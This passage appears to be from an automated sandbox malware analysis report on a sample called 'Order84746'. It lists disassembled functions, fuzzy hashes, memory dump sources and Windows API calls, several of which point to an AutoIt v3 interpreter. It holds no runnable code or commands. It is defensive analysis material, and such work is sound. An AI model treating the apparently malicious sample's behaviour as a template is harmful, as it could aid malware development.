                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 798c290410cdfa03db2dc269274787da070ce83066e60f5d9112c20514e6beb7
                          • Instruction ID: 5efe0c24d557c93fd2e6857d7e921e9911135ac04d097379e134ea58d08b5c00
                          • Opcode Fuzzy Hash: 798c290410cdfa03db2dc269274787da070ce83066e60f5d9112c20514e6beb7
                          • Instruction Fuzzy Hash: FDA0223000A20CFBCF002F83FC08C883F2CFB002A8B000020F80C00230CBB3AA20AAC2
                          Function 008F3200 Relevance: 1.0, Instructions: 986COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID:
                          • API String ID: 3964851224-0
                          • Opcode ID: 614f1d6674a1d78fd91440536fe45cd82ca28a36c6cc2d3fa992a8bc4ffdee06
                          • Instruction ID: f4e24bed23a338b93ccb0c5ef38025e7e3e696cd5954d114f671e3ed83e1d52f
                          • Opcode Fuzzy Hash: 614f1d6674a1d78fd91440536fe45cd82ca28a36c6cc2d3fa992a8bc4ffdee06
                          • Instruction Fuzzy Hash: 20927870608345DFD724DF29C490B2AB7E5FF89308F14885DEA8A8B262D771E949CB52
                          Function 008EE3B0 Relevance: .5, Instructions: 540COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dce635e505acb315416effb450bc43373d17d8d41f2b30def70d8b8e936627af
                          • Instruction ID: 21e0095d0638f0ceb8da39f79f65eb03be1fdf0cd482f26e7919436c34a50373
                          • Opcode Fuzzy Hash: dce635e505acb315416effb450bc43373d17d8d41f2b30def70d8b8e936627af
                          • Instruction Fuzzy Hash: B522AE70904259CFDB24DF59D480ABEB7B0FF1A308F148069E99ADB391E731AD85CB91
                          Function 008E93F0 Relevance: .5, Instructions: 531COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f3c4a97bc9726f8e7cb1edf23d23fdc7bc68e17a1ed0124f54ecde19b79f8ab
                          • Instruction ID: f1deec57663e4baf04247d596045b789db26dc5726aa421bcbb1b250fdb52d85
                          • Opcode Fuzzy Hash: 4f3c4a97bc9726f8e7cb1edf23d23fdc7bc68e17a1ed0124f54ecde19b79f8ab
                          • Instruction Fuzzy Hash: 5A129C70A00209EFDF04DFAAD981AAEB7F5FF49300F204529E846E7290EB35A914CB55
                          Function 008EAF50 Relevance: .5, Instructions: 514COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Exception@8Throwstd::exception::exception
                          • String ID:
                          • API String ID: 3728558374-0
                          • Opcode ID: 7ad1e7f75ca4b68988ab5b0ec8bbd32c8dcdd6893f8c70e24b079319ff66de5d
                          • Instruction ID: 79383f1a31b346284cbf12b2b10c31caafc979399d42dc870d577aeb74cd15b0
                          • Opcode Fuzzy Hash: 7ad1e7f75ca4b68988ab5b0ec8bbd32c8dcdd6893f8c70e24b079319ff66de5d
                          • Instruction Fuzzy Hash: 1A02C370E00209DFCF04DF69D991AAEB7B5FF46300F148469E806EB295EB35DA15CB92
                          Function 009002A4 Relevance: .3, Instructions: 345COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                          • Instruction ID: 11388cffb46f77f975125eecd5227a10bb93df85fc9ba8eb3b0315ff2e2b51ba
                          • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                          • Instruction Fuzzy Hash: 2FC1B1322051970EDF2D463A843453EBAA5AEE2BB171A076DD9B2CF4D6FF20D534D620
                          Function 009006D9 Relevance: .3, Instructions: 341COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                          • Instruction ID: 384b472328176e7e047b1511d06266fcbf13e7b57e66ba72229c93f551bef87a
                          • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                          • Instruction Fuzzy Hash: 32C19F322051970EDF2D463A843463EBAA5AEE2BB171A076DD5B2CF4D6FF20D534D620
                          Function 008FFA57 Relevance: .3, Instructions: 323COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                          • Instruction ID: cb5dfa97ec00b096acc7491fb9aeb5a61829dded933b19a1624c42018ead4a8e
                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                          • Instruction Fuzzy Hash: 4DC170322050AB09DB2D4639847443EBAA1AEA2BB531A077DD6B2CF5D6FF20D574D620
                          Function 011DC248 Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                          • Instruction ID: b9aff9c2ad857e8e90dc07e6341634539f6d7bde57297b0f521348d6892db110
                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                          • Instruction Fuzzy Hash: E841D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                          Function 011DC138 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                          • Instruction ID: f9ae532a91f660cc5bd0d05262f5c8f18a07274f7c3e7a188c1915ac3f5eaca1
                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                          • Instruction Fuzzy Hash: 10019278A00109EFCB48DFA8C5909AEF7F6FF48310F208599D819A7341D730AE41DB80
                          Function 011DC0D8 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                          • Instruction ID: e60e88af943c37f88622f19d13b57a45d9d5fa8b1f32938dbc4e614354aff3ac
                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                          • Instruction Fuzzy Hash: 1A019278A00109EFCB48DFA8C5909AEF7F6FF48310F208599D809A7341D730AE41DB80
                          Function 011DAAA8 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                          Function 0093A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 0093A2FE
                          • DeleteObject.GDI32(00000000), ref: 0093A310
                          • DestroyWindow.USER32 ref: 0093A31E
                          • GetDesktopWindow.USER32 ref: 0093A338
                          • GetWindowRect.USER32(00000000), ref: 0093A33F
                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0093A480
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0093A490
                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A4D8
                          • GetClientRect.USER32(00000000,?), ref: 0093A4E4
                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0093A51E
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A540
                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A553
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A55E
                          • GlobalLock.KERNEL32(00000000), ref: 0093A567
                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A576
                          • GlobalUnlock.KERNEL32(00000000), ref: 0093A57F
                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A586
                          • GlobalFree.KERNEL32(00000000), ref: 0093A591
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0093A5A3
                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0096D9BC,00000000), ref: 0093A5B9
                          • GlobalFree.KERNEL32(00000000), ref: 0093A5C9
                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0093A5EF
                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0093A60E
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A630
                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A81D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                          • String ID: $AutoIt v3$DISPLAY$static
                          • API String ID: 2211948467-2373415609
                          • Opcode ID: c0cce6ab20819399bd50ca8e044f38f63587c5dfac6eca348da08091b90bdf06
                          • Instruction ID: cbdb3cd641efd87746624d45589c36e4a274ad27a5c72a22e66b7786a43dba9f
                          • Opcode Fuzzy Hash: c0cce6ab20819399bd50ca8e044f38f63587c5dfac6eca348da08091b90bdf06
                          • Instruction Fuzzy Hash: 48027B75A10214AFDB14DFA9DD89EAE7BB9FF49310F008118F915AB2A0C7B0AD41DF61
                          Function 0094D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                          Download Yara Rule
                          APIs
                          • SetTextColor.GDI32(?,00000000), ref: 0094D2DB
                          • GetSysColorBrush.USER32(0000000F), ref: 0094D30C
                          • GetSysColor.USER32(0000000F), ref: 0094D318
                          • SetBkColor.GDI32(?,000000FF), ref: 0094D332
                          • SelectObject.GDI32(?,00000000), ref: 0094D341
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0094D36C
                          • GetSysColor.USER32(00000010), ref: 0094D374
                          • CreateSolidBrush.GDI32(00000000), ref: 0094D37B
                          • FrameRect.USER32(?,?,00000000), ref: 0094D38A
                          • DeleteObject.GDI32(00000000), ref: 0094D391
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0094D3DC
                          • FillRect.USER32(?,?,00000000), ref: 0094D40E
                          • GetWindowLongW.USER32(?,000000F0), ref: 0094D439
                            • Part of subcall function 0094D575: GetSysColor.USER32(00000012), ref: 0094D5AE
                            • Part of subcall function 0094D575: SetTextColor.GDI32(?,?), ref: 0094D5B2
                            • Part of subcall function 0094D575: GetSysColorBrush.USER32(0000000F), ref: 0094D5C8
                            • Part of subcall function 0094D575: GetSysColor.USER32(0000000F), ref: 0094D5D3
                            • Part of subcall function 0094D575: GetSysColor.USER32(00000011), ref: 0094D5F0
                            • Part of subcall function 0094D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0094D5FE
                            • Part of subcall function 0094D575: SelectObject.GDI32(?,00000000), ref: 0094D60F
                            • Part of subcall function 0094D575: SetBkColor.GDI32(?,00000000), ref: 0094D618
                            • Part of subcall function 0094D575: SelectObject.GDI32(?,?), ref: 0094D625
                            • Part of subcall function 0094D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0094D644
                            • Part of subcall function 0094D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0094D65B
                            • Part of subcall function 0094D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0094D670
                            • Part of subcall function 0094D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0094D698
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                          • String ID:
                          • API String ID: 3521893082-0
                          • Opcode ID: bc07a69010424a37a51f6876e7a9a3cac37337b3a442d475b6fffbf6086ea223
                          • Instruction ID: a2774c0df2af030f3ca28bd1a4345d42ebe7c66599a6d082ec3266f26dddc541
                          • Opcode Fuzzy Hash: bc07a69010424a37a51f6876e7a9a3cac37337b3a442d475b6fffbf6086ea223
                          • Instruction Fuzzy Hash: 85918D7190E301AFC7109F64DC08E6B7BA9FF8A325F100A1DF962961E0C7B1D944DB92
                          Function 0092DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0092DBD6
                          • GetDriveTypeW.KERNEL32(?,0097DC54,?,\\.\,0097DC00), ref: 0092DCC3
                          • SetErrorMode.KERNEL32(00000000,0097DC54,?,\\.\,0097DC00), ref: 0092DE29
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                          • API String ID: 2907320926-4222207086
                          • Opcode ID: 71e917b936ad03e3ebdaf554e4ce75237441788d2fbf95d3a7925ac6944713de
                          • Instruction ID: 6a9e1111e998c9cfa3d1e02a8644f6ab670a6e1f2b4dd03bf592d5991c8ace33
                          • Opcode Fuzzy Hash: 71e917b936ad03e3ebdaf554e4ce75237441788d2fbf95d3a7925ac6944713de
                          • Instruction Fuzzy Hash: 0951C23020EB62AF8B10DF18E882939B7A4FBD5709B208C19F457DB6E9DB60D945D742
                          Function 008ECC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                          • API String ID: 1038674560-86951937
                          • Opcode ID: 5c4063bc9bae65d50d80fddbbebcefa08f61e00178a5c79d3576e6dd74eea4f3
                          • Instruction ID: a21e11ffd01f55f8f5f9d07afd87c69fc30c8c52bb5ceec8a0d714eb152c6a6f
                          • Opcode Fuzzy Hash: 5c4063bc9bae65d50d80fddbbebcefa08f61e00178a5c79d3576e6dd74eea4f3
                          • Instruction Fuzzy Hash: 9081FA31A40259BBCB24AB6ADC43FBA3778FF56305F048024FD09E61C2EB61DA46C391
                          Function 008FB8FD Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32 ref: 008FB98B
                          • DeleteObject.GDI32(00000000), ref: 008FB9CD
                          • DeleteObject.GDI32(00000000), ref: 008FB9D8
                          • DestroyCursor.USER32(00000000), ref: 008FB9E3
                          • DestroyWindow.USER32(00000000), ref: 008FB9EE
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0095D2AA
                          • 72BB0200.COMCTL32(?,000000FF,?), ref: 0095D2E3
                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0095D711
                            • Part of subcall function 008FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008FB759,?,00000000,?,?,?,?,008FB72B,00000000,?), ref: 008FBA58
                          • SendMessageW.USER32 ref: 0095D758
                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0095D76F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
